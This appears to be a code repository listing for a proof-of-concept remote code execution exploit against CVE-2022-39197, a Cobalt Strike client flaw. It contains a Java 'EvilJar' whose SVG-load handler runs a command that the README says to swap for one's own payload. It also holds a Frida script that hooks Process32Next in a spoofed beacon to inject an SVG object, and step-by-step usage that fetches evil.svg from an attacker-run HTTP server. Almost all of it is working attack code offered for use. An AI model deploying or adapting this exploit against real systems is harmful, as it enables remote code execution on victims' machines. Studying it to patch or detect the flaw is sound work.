STRLCPY/CVE-2022-39197

■ ■ ■ ■ ■ ■

EvilJar/META-INF/MANIFEST.MF

■ ■ ■ ■ ■ ■

EvilJar/pom.xml

1	+	<?xml version="1.0" encoding="UTF-8"?>
2	+	<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
3	+	<modelVersion>4.0.0</modelVersion>
4	+
5	+	<groupId>Exploit</groupId>
6	+	<artifactId>EvilJar</artifactId>
7	+	<version>1.0</version>
8	+	<dependencies>
9	+	<dependency>
10	+	<groupId>xml-apis</groupId>
11	+	<artifactId>xml-apis-ext</artifactId>
12	+	<version>1.3.04</version>
13	+	</dependency>
14	+	</dependencies>
15	+
16	+	<properties>
17	+	<maven.compiler.source>8</maven.compiler.source>
18	+	<maven.compiler.target>8</maven.compiler.target>
19	+	<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
20	+	<project.reporting.outputEncoding>UTF-8</project.reporting.outputEncoding>
21	+	</properties>
22	+	<build>
23	+	<plugins>
24	+	<plugin>
25	+	<artifactId>maven-assembly-plugin</artifactId>
26	+	<configuration>
27	+	<archive>
28	+	<manifestFile>
29	+	${project.basedir}/META-INF/MANIFEST.MF
30	+	</manifestFile>
31	+	</archive>
32	+	<descriptorRefs>
33	+	<descriptorRef>jar-with-dependencies</descriptorRef>
34	+	</descriptorRefs>
35	+	</configuration>
36	+	<executions>
37	+	<execution>
38	+	<id>make-assembly</id> <!-- this is used for inheritance merges -->
39	+	<phase>package</phase> <!-- bind to the packaging phase -->
40	+	<goals>
41	+	<goal>single</goal>
42	+	</goals>
43	+	</execution>
44	+	</executions>
45	+	</plugin>
46	+	</plugins>
47	+	</build>
48	+	</project>

■ ■ ■ ■ ■ ■

EvilJar/src/main/java/Exploit.java

1	+	import org.w3c.dom.events.Event;
2	+	import org.w3c.dom.events.EventListener;
3	+
4	+	import org.w3c.dom.svg.EventListenerInitializer;
5	+	import org.w3c.dom.svg.SVGDocument;
6	+	import org.w3c.dom.svg.SVGSVGElement;
7	+
8	+	import java.util.*;
9	+	import java.io.*;
10	+
11	+	public class Exploit implements EventListenerInitializer {
12	+	public Exploit() {
13	+	}
14	+	public void initializeEventListeners(SVGDocument document) {
15	+	SVGSVGElement root = document.getRootElement();
16	+	EventListener listener = new EventListener() {
17	+	public void handleEvent(Event event) {
18	+	try {
19	+	Process p = Runtime.getRuntime().exec("/usr/bin/mate-calc");
20	+	} catch (Exception e) {}
21	+	}
22	+	};
23	+	root.addEventListener("SVGLoad", listener, false);
24	+	}
25	+
26	+	}

■ ■ ■ ■ ■ ■

README.md

1	+	# CVE-2022-39197 RCE POC
2	+
3	+	### Usage
4	+
5	+	- Prepare Payload
6	+	1. Edit `Line 19` with your payload in `EvilJar/src/main/java/Exploit.java`
7	+	2. Build using jar `mvn clean compile assembly:single`
8	+	3. Move `EvilJar-1.0-jar-with-dependencies.jar` from `EvilJar/target/` to `serve/` folder
9	+	4. Edit `serve\evil.svg` replace `[attacker]`
10	+	5. Serve using `python3 -m http.server 8080`
11	+
12	+	- Execute Exploit
13	+
14	+	```
15	+	python3 cve-2022-39197.py beacon.exe http://10.10.10.2:8080/evil.svg
16	+	```
17	+
18	+	Payload will be triggered as soon as the user scrolls through Process List
19	+
20	+	### POC.JPG?
21	+	![1.jpg](./images/1.jpg)
22	+
23	+
24	+	### Reference Links
25	+
26	+	[https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg](https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg) — There’s a great in depth analysis of this vulnerability
27	+	[https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html](https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html)

■ ■ ■ ■ ■ ■

cve-2022-39197.py

1	+	import frida
2	+	import time
3	+	import sys
4	+
5	+	def processInject(target, url):
6	+	print('[+] Spawning target process')
7	+
8	+	pid=frida.spawn(target)
9	+	session=frida.attach(pid)
10	+
11	+	frida_script ='''
12	+	var payload="<html><object classid='org.apache.batik.swing.JSVGCanvas'><param name='URI' value='USER_PAYLOAD'></param></object>"
13	+	var pProcess32Next = Module.findExportByName("kernel32.dll", "Process32Next")
14	+
15	+	Interceptor.attach(pProcess32Next, {
16	+	onEnter: function(args) {
17	+	this.pPROCESSENTRY32 = args[1];
18	+	},
19	+	onLeave: function(retval) {
20	+	if(this.pPROCESSENTRY32.add(44).readAnsiString() == "beacon.exe") {
21	+	send("[!] Found beacon, injecting payload");
22	+	this.pPROCESSENTRY32.add(44).writeAnsiString(payload);
23	+	}
24	+	}
25	+	})
26	+	'''.replace("USER_PAYLOAD",url)
27	+
28	+	script = session.create_script(frida_script)
29	+	script.load()
30	+	frida.resume(pid)
31	+	#make sure payload is triggered on client
32	+	print("[+] Waiting for 100 seconds")
33	+	time.sleep(100)
34	+	frida.kill(pid)
35	+	print('[+] Done! Killed beacon process.')
36	+	exit(0)
37	+
38	+	if __name__=='__main__':
39	+	if len(sys.argv) == 3:
40	+	processInject(sys.argv[1], sys.argv[2])
41	+	else:
42	+	print("[-] Incorrect Usage!\n\nExample: python3 {} beacon.exe http://10.10.10.2:8080/evil.svg".format(sys.argv[0]))

images/1.jpg

■ ■ ■ ■ ■ ■

requirements.txt

+

frida-tools

serve/evil.svg